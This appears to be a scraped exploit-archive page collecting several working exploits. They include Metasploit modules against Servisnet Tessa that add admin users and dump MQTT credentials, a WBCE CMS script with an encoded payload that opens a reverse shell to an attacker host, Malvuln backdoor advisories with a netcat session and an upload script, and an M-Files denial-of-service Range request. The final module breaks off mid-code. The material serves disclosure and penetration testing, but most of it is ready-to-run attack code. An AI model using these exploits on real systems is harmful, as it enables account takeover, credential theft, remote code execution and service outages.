<pre><code>##<br /># This module requires Metasploit: https://metasploit.com/download<br /># Current source: https://github.com/rapid7/metasploit-framework<br />##<br /><br />class MetasploitModule < Msf::Auxiliary<br /> include Msf::Exploit::Remote::HttpClient<br /><br /> def initialize(info = {})<br /> super(update_info(info,<br /> 'Name' => 'Servisnet Tessa - Privilege Escalation (Metasploit)',<br /> 'Description' => %q(<br /> This module exploits privilege escalation in Servisnet Tessa, triggered by add new sysadmin user with any user authorization .<br /> An API request to "/data-service/users/[userid]" with any low-authority user returns other users' information in response.<br /> The encrypted password information is included here, but privilage escelation is possible with the active sessionid value.<br /><br /> var token = Buffer.from(`${user.username}:${user.usersessionid}`, 'utf8').toString('base64');<br /><br /> The logic required for the Authorization header is as above.<br /> Therefore, after accessing an authorized user ID value and active sessionId value, <br /> if the username and sessionId values are encoded with base64, a valid Token will be obtained and a new admin user can be added. <br /><br /> ),<br /> 'References' =><br /> [<br /> [ 'CVE', 'CVE-2022-22832' ],<br /> [ 'URL', 'https://www.pentest.com.tr/exploits/Servisnet-Tessa-Privilege-Escalation.html' ],<br /> [ 'URL', 'http://www.servisnet.com.tr/en/page/products' ]<br /> ],<br /> 'Author' =><br /> [<br /> 'Özkan Mustafa AKKUŞ <AkkuS>' # Discovery & PoC & MSF Module @ehakkus<br /> ],<br /> 'License' => MSF_LICENSE,<br /> 'DisclosureDate' => "Dec 22 2021",<br /> 'DefaultOptions' =><br /> {<br /> 'RPORT' => 443,<br /> 'SSL' => true<br /> }<br /> ))<br /><br /> register_options([<br /> OptString.new('USERNAME', [true, 'Servisnet Username']),<br /> OptString.new('PASSWORD', [true, 'Servisnet Password']),<br /> OptString.new('TARGETURI', [true, 'Base path for application', '/'])<br /> ])<br /> end<br /> # split strings to salt<br /> def split(data, string_to_split) <br /> word = data.scan(/"#{string_to_split}"\] = "([\S\s]*?)"/)<br /> string = word.split('"]').join('').split('["').join('')<br /> return string<br /> end <br /> # split JSONs to salt<br /> def splitJSON(data, string_to_split) <br /> word = data.scan(/"#{string_to_split}":"([\S\s]*?)"/)<br /> string = word.split('"]').join('').split('["').join('')<br /> return string<br /> end <br /> # split JSONs to salt none "<br /> def splitJSON2(data, string_to_split) <br /> word = data.scan(/"#{string_to_split}":([\S\s]*?),/)[0]<br /> string = word.split('"]').join('').split('["').join('')<br /> return string<br /> end <br /><br /> def app_path<br /> res = send_request_cgi({<br /> # default.a.get( check <br /> 'uri' => normalize_uri(target_uri.path, 'js', 'app.js'),<br /> 'method' => 'GET'<br /> }) <br /> <br /> if res && res.code == 200 && res.body =~ /baseURL/<br /> data = res.body<br /> #word = data.scan(/"#{string_to_split}"\] = "([\S\s]*?)"/)<br /> base_url = data.scan(/baseURL: '\/([\S\s]*?)'/)[0] <br /> return base_url<br /> else<br /> fail_with(Failure::NotVulnerable, 'baseURL not found!')<br /> end<br /> end<br /><br /> def add_user(token, app_path)<br /> newuser = Rex::Text.rand_text_alpha_lower(8) <br /> id = Rex::Text.rand_text_numeric(4) <br /> # encrypted password hxZ8I33nmy9PZNhYhms/Dg== / 1111111111<br /> json_data = '{"alarm_request": 1, "city_id": null, "city_name": null, "decryptPassword": null, "email": "' + newuser + '@localhost.local", "id": ' + id + ', "invisible": 0, "isactive": 1, "isblocked": 0, "levelstatus": 1, "local_authorization": 1, "mail_request": 1, "name": "' + newuser + '", "password": "hxZ8I33nmy9PZNhYhms/Dg==", "phone": null, "position": null, "region_name": "test4", "regional_id": 0, "role_id": 1, "role_name": "Sistem Admin", "rolelevel": 3, "status": null, "surname": "' + newuser + '", "totalRecords": null, "try_pass_right": 0, "userip": null, "username": "' + newuser + '", "userType": "Lokal Kullanıcı"}'<br /><br /> res = send_request_cgi(<br /> {<br /> 'method' => 'POST',<br /> 'ctype' => 'application/json',<br /> 'uri' => normalize_uri(target_uri.path, app_path, 'users'),<br /> 'headers' =><br /> {<br /> 'Authorization' => token<br /> },<br /> 'data' => json_data<br /> })<br /><br /> if res && res.code == 200 && res.body =~ /localhost/<br /> print_good("The sysAdmin authorized user has been successfully added.")<br /> print_status("Username: #{newuser}")<br /> print_status("Password: 1111111111")<br /> else<br /> fail_with(Failure::NotVulnerable, 'An error occurred while adding the user. Try again.')<br /> end<br /> end<br /><br /> def sessionid_check<br /><br /> res = send_request_cgi({<br /> # user.usersessionid check <br /> 'uri' => normalize_uri(target_uri.path, 'js', 'app.js'),<br /> 'method' => 'GET'<br /> }) <br /> <br /> if res && res.code == 200 && res.body =~ /user.usersessionid/ <br /> return Exploit::CheckCode::Vulnerable<br /> else<br /> fail_with(Failure::NotVulnerable, 'Target is not vulnerable.')<br /> end<br /><br /> end<br /><br /> def find_admin(token, userid, app_path) <br /><br /> res = send_request_cgi({<br /> # token check <br /> 'uri' => normalize_uri(target_uri.path, app_path, 'users', userid),<br /> 'headers' =><br /> {<br /> 'Authorization' => token<br /> },<br /> 'method' => 'GET'<br /> }) <br /><br /> if not res && res.code == 200 && res.body =~ /usersessionid/<br /> fail_with(Failure::NotVulnerable, 'An error occurred while use Token. Try again.')<br /> end<br /><br /> loopid = userid.to_i<br /> $i = 0<br /> # The admin userid must be less than the low-authority userid.<br /> while $i < loopid do<br /> $i +=1<br /> res = send_request_cgi({<br /> # token check <br /> 'uri' => normalize_uri(target_uri.path, app_path, 'users', $i),<br /> 'headers' =><br /> {<br /> 'Authorization' => token<br /> },<br /> 'method' => 'GET'<br /> }) <br /><br /> if res.code == 200 and res.body.include? '"Sistem Admin"' <br /> admin_uname = splitJSON(res.body, 'username')<br /> admin_sessid = splitJSON(res.body, 'usersessionid') <br /> admin_userid = splitJSON2(res.body, 'id')<br /> enc_token = Rex::Text.encode_base64('' + admin_uname + ':' + admin_sessid + '')<br /> token_admin = 'Basic ' + enc_token + ''<br /> print_good("Excellent! Admin user found.")<br /> print_good("Admin Username: #{admin_uname}")<br /> print_good("Admin SessionId: #{admin_sessid}")<br /> if session_check(token_admin, admin_userid, admin_uname) == "OK"<br /> break<br /> end<br /> end <br /> end<br /> end<br /><br /> def session_check(token, userid, user) <br /> <br /> res = send_request_cgi({<br /> # session check <br /> 'uri' => normalize_uri(target_uri.path, app_path, 'users', userid),<br /> 'headers' =><br /> {<br /> 'Authorization' => token<br /> },<br /> 'method' => 'GET'<br /> }) <br /><br /> if res && res.code == 200 && res.body =~ /managers_codes/<br /> print_good("Admin session is active.")<br /> add_user(token, app_path)<br /> return "OK"<br /> else<br /> print_status("Admin user #{user} is not online. Try again later.")<br /> return "NOT"<br /> end <br /> end<br /><br /> def login_check(user, pass)<br /><br /> json_data = '{"username": "' + user + '", "password": "' + pass + '"}'<br /><br /> res = send_request_cgi(<br /> {<br /> 'method' => 'POST',<br /> 'ctype' => 'application/json',<br /> 'uri' => normalize_uri(target_uri.path, app_path, 'api', 'auth', 'signin'),<br /> 'data' => json_data<br /> }) <br /> <br /> if res && res.code == 200 && res.body =~ /usersessionid/<br /> sessid = splitJSON(res.body, 'usersessionid')<br /> userid = splitJSON2(res.body, 'id')<br /> print_status("Sessionid: #{sessid}") <br /> print_status("Userid: #{userid}")<br /> enc_token = Rex::Text.encode_base64('' + user + ':' + sessid + '')<br /> token = 'Basic ' + enc_token + ''<br /> print_status("Authorization: #{token}")<br /> find_admin(token, userid, app_path)<br /> <br /><br /> else<br /> fail_with(Failure::NotVulnerable, 'An error occurred while login. Try again.')<br /> end<br /> end<br /><br /> def check <br /> <br /> if sessionid_check <br /> return Exploit::CheckCode::Vulnerable<br /> else<br /> return Exploit::CheckCode::Safe<br /> end<br /> end<br /> <br /> def run<br /> unless Exploit::CheckCode::Vulnerable == check<br /> fail_with(Failure::NotVulnerable, 'Target is not vulnerable.')<br /> end<br /> login_check(datastore['USERNAME'], datastore['PASSWORD']) <br /> end<br />end<br /> <br /></code></pre>
<pre><code>Discovery / credits: Malvuln - malvuln.com (c) 2021<br />Original source: https://malvuln.com/advisory/99b4428521fa9d9da18e0ccd79e5b985.txt<br />Contact: malvuln13@gmail.com<br />Media: twitter.com/malvuln<br /><br />Threat: Backdoor.Win32.Bionet.10<br />Vulnerability: Authentication Bypass RCE<br />Description: The malware listens on TCP port 12348. Third-party attackers who can reach infected systems can logon using any username/password combination. Intruders may then upload executables using ftp PASV, STOR commands, this can result in remote code execution.<br />Type: PE32<br />MD5: 99b4428521fa9d9da18e0ccd79e5b985<br />Vuln ID: MVID-2021-0414<br />Disclosure: 12/03/2021<br /><br /><br />Exploit/PoC:<br />nc64.exe 192.168.18.125 12348<br />220 BNFTP Server ready.<br />USER malvuln<br />331 Password required for malvuln.<br />PASS malvuln<br />230 User malvuln logged in.<br />SYST<br />215 UNIX Type: L8 Internet Component Suite<br />CDUP<br />250 CWD command successful. "C:/" is current directory.<br />PASV<br />227 Entering Passive Mode (192,168,18,125,194,182).<br />STOR DOOM-SM.exe<br />150 Opening data connection for DOOM-SM.exe.<br />226 File received ok<br /><br /><br />from socket import *<br /><br />MALWARE_HOST="192.168.18.125"<br />PORT=49846<br />DOOM="DOOM-SM.exe"<br /><br />def doit():<br /> s=socket(AF_INET, SOCK_STREAM)<br /> s.connect((MALWARE_HOST, PORT))<br /><br /> f = open(DOOM, "rb")<br /> EXE = f.read()<br /> s.send(EXE)<br /><br /> while EXE:<br /> s.send(EXE)<br /> EXE=f.read()<br /> <br /> s.close()<br /><br /> print("By Malvuln");<br /><br />if __name__=="__main__":<br /> doit()<br /><br /><br />Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).<br /></code></pre>
<pre><code># Exploit Title: WBCE CMS 1.5.2 - Remote Code Execution (RCE) (Authenticated)<br /># Date: 02/01/2022<br /># Exploit Author: Antonio Cuomo (arkantolo)<br /># Vendor Homepage: https://wbce.org/<br /># Software Link: https://wbce.org/de/downloads/<br /># Version: 1.5.2<br /># Tested on: Linux - PHP Version: 8.0.14<br /># Github repo: https://github.com/WBCE/WBCE_CMS<br /><br /># -*- coding: utf-8 -*-<br />#/usr/bin/env python<br /><br />import requests<br />import string<br />import base64<br />import argparse<br />import time<br />import io<br />from bs4 import BeautifulSoup #pip install beautifulsoup4<br /><br />PAYLOAD = 'UEsDBBQAAAAIAI1+n1Peb3ztBAMAAFUHAAAMAAAAdDE4YmtuZXYucGhwhVVtT9swEP6OxH8wUaQmUqAJ24epUSYh6CY0CbQC2weGIje5UKuJndkOhSH++85OQqqqtBIizr08eZ6783U8nujoy3zJ4enwAF8ODxToVLMK0pJVTHuhH7u/prOby+urxIlOQid2WZ246Wz68256c3vvSHhKWe08xG4tpN70GJvxZYuGL1PF/kESfQ7D2F1JpiGlCW/KMnZBSiHf39QCyjIZNZxWQI5pTFYxYXlMxnPGx2pBjtkodnMKleBJiCeYN494YIVXNDzTTPAUnpnSyhvVGddlWgi5HPn+q1uzPBlMnm9yrDE5jvzXWjKuUbMznc2uZxNyTvlIExPp+DE8oyfy47cuxX+1lrC11EKx51SBViz3/E04o66H62PWIXsxUfwGpQIypP4+m11dXn2fkG+UlZATLUgbyxScEHK7YIrg39+GaSCZqNBDKM8JF0icalqeOIifLXImPWeM56aiamm7qkS2TArzX9TAPWxrYFsYmG5wYR9Ky+BTaMt0ZBPWVHV+4rXxG4JAZZLVWkhVQ5ZQKemLFyZf24NTsxqcwJGOH0SbxhUaT7cYkXItRQZKJeaZWtbtrAQb3wtck6Za3kylEpRoZAZej+B/1GxV0xUnFnRdD+oEWpn+pvMSy8D4o9d+4z58CLBAOwKifQGnHwbYkhvnO9mbJjP8C7wnL8RUAHKC9wykgpa1mRBs5cS2EiWsFqwE1PBqbgeIosXcov/GZmeCc7BXiGiQFeNUQ44wcyS3jN86kEHah0BdobeiuPjIU9pORSdyKNZ7VbDhvKnSbEH5I+SpCQOtkvdClUjU67CCfqEE/S4JzC6xE8B4uv6lLsO3JWmXhz/U9/r8B5lNzy6Qrct43eikMPF97rDHEHp7+oS0iYhQWFJrk9J6cKDWaQ3Sd1O7vbi+u91GbkDYT9CCbKFo5O2kd7qfHg7ALnqnu+kNIHvpvRVZKVRnxiD7NpR50xJtWuxw2SVircNaiPsfENJTcpXG06OVfNTt6W7mnc73hztI6fBAgm4kJ2H8H1BLAQI/ABQAAAAIAI1+n1Peb3ztBAMAAFUHAAAMACQAAAAAAAAAIAAAAAAAAAB0MThia25ldi5waHAKACAAAAAAAAEAGACAuZAFVv7XAYC5kAVW/tcB6Bk8KTf+1wFQSwUGAAAAAAEAAQBeAAAALgMAAAAA'<br /><br />def main():<br /> parser = argparse.ArgumentParser(description='WBCE <= 1.5.2 - Remote Code Execution (Authenticated)')<br /> parser.add_argument('-x', '--url', type=str, required=True)<br /> parser.add_argument('-u', '--user', type=str, required=False)<br /> parser.add_argument('-p', '--password', type=str, required=False)<br /> parser.add_argument('-ah', '--attacker_host', type=str, required=False)<br /> parser.add_argument('-ap', '--attacker_port', type=str, required=False)<br /> args = parser.parse_args()<br /> print("\nWBCE 1.5.2 - Remote Code Execution (Authenticated)","\nExploit Author: Antonio Cuomo (Arkantolo)\n")<br /> exploit(args, PAYLOAD)<br /><br />def exploit(args, payload):<br /> s2 = requests.Session()<br /><br /> #login<br /> body= {'url':'','username_fieldname':'username_t18bknev','password_fieldname':'password_t18bknev','username_t18bknev':args.user,'password_t18bknev':args.password}<br /> r = s2.post(args.url+'/admin/login/index.php', data=body, allow_redirects=False)<br /> if(r.status_code==302 and r.headers['location'].find('/start/') != -1):<br /> print("[*] Login OK")<br /> else:<br /> print("[*] Login Failed")<br /> exit(1)<br /><br /> time.sleep(1)<br /> <br /> #create droplet<br /> up = {'userfile':('t18bknev.zip', io.BytesIO(base64.b64decode(PAYLOAD)), "multipart/form-data")}<br /> r = s2.post(args.url+'/admin/admintools/tool.php?tool=droplets&upload=1', files=up)<br /> if(r.status_code==200 and r.text.find('1 Droplet(s) imported') != -1):<br /> print("[*] Droplet OK")<br /> else:<br /> print("[*] Exploit Failed")<br /> exit(1)<br /><br /> time.sleep(1)<br /> <br /> #get csrf token<br /> r = s2.get(args.url+'/admin/pages/index.php')<br /> soup = BeautifulSoup(r.text, 'html.parser')<br /> formtoken = soup.find('input', {'name':'formtoken'})['value']<br /> <br /> #create page<br /> body= {'formtoken':formtoken,'title':'t18bknev','type':'wysiwyg','parent':'0','visibility':'public','save':''}<br /> r = s2.post(args.url+'/admin/pages/add.php', data=body, allow_redirects=False)<br /> soup = BeautifulSoup(r.text, 'html.parser')<br /> try:<br /> page_id = soup.findAll("script")[9].string.split("location.href='")[-1].split("\");")[0].split("'")[0].split("=")[1]<br /> print("[*] Page OK ["+page_id+"]")<br /> except:<br /> print("[*] Exploit Failed")<br /> exit(1)<br /> <br /> time.sleep(1)<br /> <br /> #get csrf token<br /> print("[*] Getting token")<br /> r = s2.get(args.url+'/admin/pages/modify.php?page_id='+page_id)<br /> soup = BeautifulSoup(r.text, 'html.parser')<br /> formtoken = soup.find('input', {'name':'formtoken'})['value']<br /> section_id = soup.find('input', {'name':'section_id'})['value']<br /> <br /> time.sleep(1)<br /> <br /> #add droplet to page<br /> body= {'page_id':page_id,'formtoken':formtoken,'section_id':section_id,'content'+section_id:'[[t18bknev]]','modify':'save'}<br /> r = s2.post(args.url+'/modules/wysiwyg/save.php', data=body, allow_redirects=False)<br /> if(r.status_code==200 and r.text.find('Page saved') != -1):<br /> print("[*] Adding droplet OK")<br /> else:<br /> print("[*] Exploit Failed")<br /> exit(1) <br /> <br /> time.sleep(1)<br /> <br /> input("Please make sure that your nc listner is ready...\n\nPRESS ENTER WHEN READY")<br /> body= {'rev_ip':args.attacker_host,'rev_port':args.attacker_port}<br /> r = s2.post(args.url+'/pages/t18bknev.php', data=body, allow_redirects=False)<br /> if(r.status_code==200):<br /> print("[*] Exploit OK - check your listner")<br /> exit(0)<br /> else:<br /> print("[*] Exploit Failed")<br /> exit(1)<br /><br />if __name__ == '__main__':<br /> main()<br /> <br /><br /></code></pre>
<pre><code>Discovery / credits: Malvuln - malvuln.com (c) 2021<br />Original source: https://malvuln.com/advisory/f529d60abbdafccce3dc5e5ffd6cdfa6.txt<br />Contact: malvuln13@gmail.com<br />Media: twitter.com/malvuln<br /><br />Threat: Backdoor.Win32.Vernet.axt<br />Vulnerability: Insecure Permissions<br />Description: The malware writes an .EXE with insecure permissions under c:\ drive granting change (C) permissions to the authenticated user group. Standard users can rename the executable dropped by the malware to disable it or replace it with their own executable. Then wait for a privileged user to logon to the infected machine to potentially escalate privileges.<br />Type: PE32<br />MD5: f529d60abbdafccce3dc5e5ffd6cdfa6<br />Vuln ID: MVID-2021-0413<br />Disclosure: 12/03/2021<br /><br /><br />Exploit/PoC:<br />C:\>cacls chikean.exe<br />C:\chikean.exe BUILTIN\Administrators:(ID)F<br /> NT AUTHORITY\SYSTEM:(ID)F<br /> BUILTIN\Users:(ID)R<br /> NT AUTHORITY\Authenticated Users:(ID)C<br /><br /><br />C:\>dir chikean.exe<br /> Volume in drive C has no label.<br /><br /> Directory of C:\<br /><br />06/17/2012 01:43 AM 146,944 chikean.exe<br /> 1 File(s) 146,944 bytes<br /><br /><br />Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).<br /></code></pre>
<pre><code>##<br /># This module requires Metasploit: https://metasploit.com/download<br /># Current source: https://github.com/rapid7/metasploit-framework<br />##<br /><br />require 'metasploit/framework/credential_collection'<br />require 'metasploit/framework/login_scanner/mqtt'<br /><br />class MetasploitModule < Msf::Auxiliary<br /> include Msf::Exploit::Remote::Tcp<br /> include Msf::Auxiliary::Scanner<br /> include Msf::Auxiliary::MQTT<br /> include Msf::Auxiliary::Report<br /> include Msf::Auxiliary::AuthBrute<br /> include Msf::Exploit::Remote::HttpClient<br /><br /> def initialize(info = {})<br /> super(update_info(info,<br /> 'Name' => 'Servisnet Tessa - MQTT Credentials Dump (Unauthenticated) (Metasploit)',<br /> 'Description' => %q(<br /> This module exploits MQTT creds dump vulnerability in Servisnet Tessa.<br /> The app.js is publicly available which acts as the backend of the application.<br /> By exposing a default value for the "Authorization" HTTP header, <br /> it is possible to make unauthenticated requests to some areas of the application. <br /> Even MQTT(Message Queuing Telemetry Transport) protocol connection information can be obtained with this method.<br /> A new admin user can be added to the database with this header obtained in the source code. <br /><br /> The module tries to log in to the MQTT service with the credentials it has obtained, <br /> and reflects the response it receives from the service. <br /><br /> ),<br /> 'References' =><br /> [<br /> [ 'CVE', 'CVE-2022-22833' ],<br /> [ 'URL', 'https://pentest.com.tr/exploits/Servisnet-Tessa-MQTT-Credentials-Dump-Unauthenticated.html' ],<br /> [ 'URL', 'http://www.servisnet.com.tr/en/page/products' ]<br /> ],<br /> 'Author' =><br /> [<br /> 'Özkan Mustafa AKKUŞ <AkkuS>' # Discovery & PoC & MSF Module @ehakkus<br /> ],<br /> 'License' => MSF_LICENSE,<br /> 'DisclosureDate' => "Dec 22 2021",<br /> 'DefaultOptions' =><br /> {<br /> 'RPORT' => 443,<br /> 'SSL' => true<br /> }<br /> ))<br /><br /> register_options([<br /> OptString.new('TARGETURI', [true, 'Base path for application', '/'])<br /> ])<br /> end<br /> # split strings to salt<br /> def split(data, string_to_split) <br /> word = data.scan(/"#{string_to_split}"\] = "([\S\s]*?)"/)<br /> string = word.split('"]').join('').split('["').join('')<br /> return string<br /> end <br /><br /> def check_mqtt<br /> res = send_request_cgi({<br /> # default.a.get( check <br /> 'uri' => normalize_uri(target_uri.path, 'js', 'app.js'),<br /> 'method' => 'GET'<br /> }) <br /> <br /> if res && res.code == 200 && res.body =~ /connectionMQTT/<br /> data = res.body<br /> #word = data.scan(/"#{string_to_split}"\] = "([\S\s]*?)"/)<br /> mqtt_host = data.scan(/host: '([\S\s]*?)'/)[0][0]<br /> rhost = mqtt_host.split('mqtts://').join('')<br /> print_status("MQTT Host: #{mqtt_host}") <br /> mqtt_port = data.scan(/port: ([\S\s]*?),/)[0][0]<br /> print_status("MQTT Port: #{mqtt_port}") <br /> mqtt_end = data.scan(/endpoint: '([\S\s]*?)'/)[0][0]<br /> print_status("MQTT Endpoint: #{mqtt_end}") <br /> mqtt_cl = data.scan(/clientId: '([\S\s]*?)'/)[0][0]<br /> print_status("MQTT clientId: #{mqtt_cl}")<br /> mqtt_usr = data.scan(/username: '([\S\s]*?)'/)[1][0]<br /> print_status("MQTT username: #{mqtt_usr}")<br /> mqtt_pass = data.scan(/password: '([\S\s]*?)'/)[1][0]<br /> print_status("MQTT password: #{mqtt_pass}")<br /><br /> print_status("##### Starting MQTT login sweep #####")<br /><br /> # Removed brute force materials that can be included for the collection.<br /> cred_collection = Metasploit::Framework::CredentialCollection.new(<br /> password: mqtt_pass,<br /> username: mqtt_usr<br /> )<br /> # this definition already exists in "auxiliary/scanner/mqtt/connect". Moved into exploit.<br /> cred_collection = prepend_db_passwords(cred_collection)<br /><br /> scanner = Metasploit::Framework::LoginScanner::MQTT.new(<br /> host: rhost,<br /> port: mqtt_port,<br /> read_timeout: datastore['READ_TIMEOUT'],<br /> client_id: client_id,<br /> proxies: datastore['PROXIES'],<br /> cred_details: cred_collection,<br /> stop_on_success: datastore['STOP_ON_SUCCESS'],<br /> bruteforce_speed: datastore['BRUTEFORCE_SPEED'],<br /> connection_timeout: datastore['ConnectTimeout'],<br /> max_send_size: datastore['TCP::max_send_size'],<br /> send_delay: datastore['TCP::send_delay'],<br /> framework: framework,<br /> framework_module: self,<br /> ssl: datastore['SSL'],<br /> ssl_version: datastore['SSLVersion'],<br /> ssl_verify_mode: datastore['SSLVerifyMode'],<br /> ssl_cipher: datastore['SSLCipher'],<br /> local_port: datastore['CPORT'],<br /> local_host: datastore['CHOST']<br /> )<br /><br /> scanner.scan! do |result|<br /> credential_data = result.to_h<br /> credential_data.merge!(<br /> module_fullname: fullname,<br /> workspace_id: myworkspace_id<br /> )<br /> password = result.credential.private<br /> username = result.credential.public<br /> if result.success?<br /> credential_core = create_credential(credential_data)<br /> credential_data[:core] = credential_core<br /> create_credential_login(credential_data)<br /> print_good("MQTT Login Successful: #{username}/#{password}")<br /> else<br /> invalidate_login(credential_data)<br /> vprint_error("MQTT LOGIN FAILED: #{username}/#{password} (#{result.proof})")<br /> end<br /> end<br /> end<br /> end<br /><br /> def auth_bypass<br /> res = send_request_cgi({<br /> # default.a.defaults.headers.post["Authorization"] check <br /> 'uri' => normalize_uri(target_uri.path, 'js', 'app.js'),<br /> 'method' => 'GET'<br /> }) <br /> <br /> if res && res.code == 200 && res.body =~ /default.a.defaults.headers.post/<br /> token = split(res.body, 'Authorization')<br /> print_status("Authorization: #{token}") <br /> return token<br /> else<br /> fail_with(Failure::NotVulnerable, 'Target is not vulnerable.')<br /> end<br /> end<br /><br /> def check <br /> if auth_bypass =~ /Basic/ <br /> return Exploit::CheckCode::Vulnerable<br /> else<br /> return Exploit::CheckCode::Safe<br /> end<br /> end<br /> <br /> def run<br /> unless Exploit::CheckCode::Vulnerable == check<br /> fail_with(Failure::NotVulnerable, 'Target is not vulnerable.')<br /> end<br /> check_mqtt <br /> end<br />end<br /> <br /><br /><br /></code></pre>
<pre><code>I. SUMMARY<br />=============================================================================================================================================================<br />Title: M-Files Web Improper Range Header Processing Denial of Services<br />(DoS) Vulnerability<br />Product: M-Files Web version before 20.10.9524.1, M-Files Web version<br />before 20.10.9445.0<br />Vulnerability Type(s): Denial of Services (DoS)<br />Credit by/Researcher: Murat Aydemir (Turkey)<br />Contact: https://twitter.com/mrtydmr75<br />Github: https://github.com/murataydemir<br />=============================================================================================================================================================<br /><br />II. CVE REFERENCE, CVSS SCORES & VULNERABILITY TYPES<br />=============================================================================================================================================================<br />CVE Number: CVE-2021-37253<br />CVSSv3 Score: 4.3<br />CVSSv3 Vector: CVSS:4.3 (AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L)<br />Severity: Medium<br />Confidentiality Impact: None (There is no impact to the confidentiality of<br />the system)<br />Integrity Impact: None (There is no impact to the integrity of the system)<br />Availability Impact: Complete (There is a total shutdown of the affected<br />resource. The attacker can render the resource completely unavailable)<br />Access Complexity: Low (Specialized access conditions or extenuating<br />circumstances do not exist. Very little knowledge or skill is required to<br />exploit)<br />Authentication: Not required (Authentication is not required to exploit the<br />vulnerability)<br />Gained Access: None<br />Vulnerability Type(s): Denial of Services (DoS)<br />CWE ID: CWE-399 Resource Management Errors (<br />https://cwe.mitre.org/data/definitions/399.html)<br />=============================================================================================================================================================<br /><br />III. TIMELINE<br />=============================================================================================================================================================<br />Contact to Vendor: the 24th of August, 2020<br />Vendor (M-Files) Reply: the 3rd of November, 2020 (rejected vulnerability)<br />Contact to Vendor: the 4th of November, 2020 (provide additional<br />informations & some of proof of concepts)<br />Vendor (M-Files) Reply: the 6th of November, 2020 (accepted vulnerability<br />and ask time to fix)<br />Vendor (M-Files) Reply: the 4th of August, 2021 (inform me that "we're<br />accepting this vulnerability but we'll not give an effort to fix that and<br />also will not apply any CVE for this vuln.")<br />Contact to MITRE: the 4th of August, 2021 (contacted MITRE and applied for<br />CVE. MITRE has reserved CVE to me for this vulnerability)<br />=============================================================================================================================================================<br /><br />IV. DESCRIPTION & MITIGATION<br />=============================================================================================================================================================<br />M-Files Web version before 20.10.9524.1 and M-Files Web version before<br />20.10.9445.0 contain an Improper Range Header Processing Vulnerability. A<br />remote unauthenticated attacker may send crafted requests with overlapping<br />ranges (via HTTP requests with a specially-crafted Range or Request-Range<br />headers) to cause the web application to compress each of the requested<br />bytes, resulting in a crash due to excessive memory and CPU consumption and<br />preventing users from accessing the system.<br /><br />Even if this vulnerability (CVE-2021-37253) has been verified and accepted<br />by the Vendor (M-Files), their security team also contacted me and informed<br />me that no effort will be given to fixing this vulnerability. Thus, there<br />is no active patch, update or mitigation plan for CVE-2021-37253<br />vulnerability. These are not exactly fix the problem (maybe just<br />remediation), however I strongly recommend you to restrict IP addresses for<br />web applications which incoming requests/clients or reconfigure the web<br />server for "Byte-range Request Segment Size" as soon as possible.<br />=============================================================================================================================================================<br /><br />V. PROOF OF CONCEPT (POC) FOR CVE-2021-37253<br />=============================================================================================================================================================<br />This is easy to detect and exploit for this vulnerability. Just find a<br />static content (such as .png, .jpg, .jpeg, .js, .css and so on) and make a<br />request as follows.<br /><br />GET /Icons/Standard/Listing/VaultMounting.png HTTP/1.1<br />Host: <host><br />User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:79.0)<br />Gecko/20100101 Firefox/79.0<br />Accept: application/json, text/javascript, */*; q=0.01<br />Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3<br />Connection: close<br />Range:<br />bytes=0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-<br /><br />Note: this issue is valid and easly reproducable for all static assests<br />(which has .png, .jpg, .jpeg, .js, .css, .gif extensions and so on)<br />=============================================================================================================================================================<br /><br />VI. REFERENCE(S)<br />=============================================================================================================================================================<br />https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-37253<br />https://nvd.nist.gov/vuln/detail/CVE-2021-37253<br />=============================================================================================================================================================<br /><br /><br /></code></pre>
<pre><code>##<br /># This module requires Metasploit: https://metasploit.com/download<br /># Current source: https://github.com/rapid7/metasploit-framework<br />##<br /><br />class MetasploitModule < Msf::Auxiliary<br /> include Msf::Exploit::Remote::HttpClient<br /><br /> def initialize(info = {})<br /> super(update_info(info,<br /> 'Name' => 'Servisnet Tessa - Add sysAdmin User (Unauthenticated) (Metasploit)',<br /> 'Description' => %q(<br /> This module exploits an authentication bypass in Servisnet Tessa, triggered by add new sysadmin user.<br /> The app.js is publicly available which acts as the backend of the application.<br /> By exposing a default value for the "Authorization" HTTP header, <br /> it is possible to make unauthenticated requests to some areas of the application. <br /> Even MQTT(Message Queuing Telemetry Transport) protocol connection information can be obtained with this method.<br /> A new admin user can be added to the database with this header obtained in the source code. <br /><br /> ),<br /> 'References' =><br /> [<br /> [ 'CVE', 'CVE-2022-22831' ],<br /> [ 'URL', 'https://www.pentest.com.tr/exploits/Servisnet-Tessa-Add-sysAdmin-User-Unauthenticated.html' ],<br /> [ 'URL', 'http://www.servisnet.com.tr/en/page/products' ]<br /> ],<br /> 'Author' =><br /> [<br /> 'Özkan Mustafa AKKUŞ <AkkuS>' # Discovery & PoC & MSF Module @ehakkus<br /> ],<br /> 'License' => MSF_LICENSE,<br /> 'DisclosureDate' => "Dec 22 2021",<br /> 'DefaultOptions' =><br /> {<br /> 'RPORT' => 443,<br /> 'SSL' => true<br /> }<br /> ))<br /><br /> register_options([<br /> OptString.new('TARGETURI', [true, 'Base path for application', '/'])<br /> ])<br /> end<br /> # split strings to salt<br /> def split(data, string_to_split) <br /> word = data.scan(/"#{string_to_split}"\] = 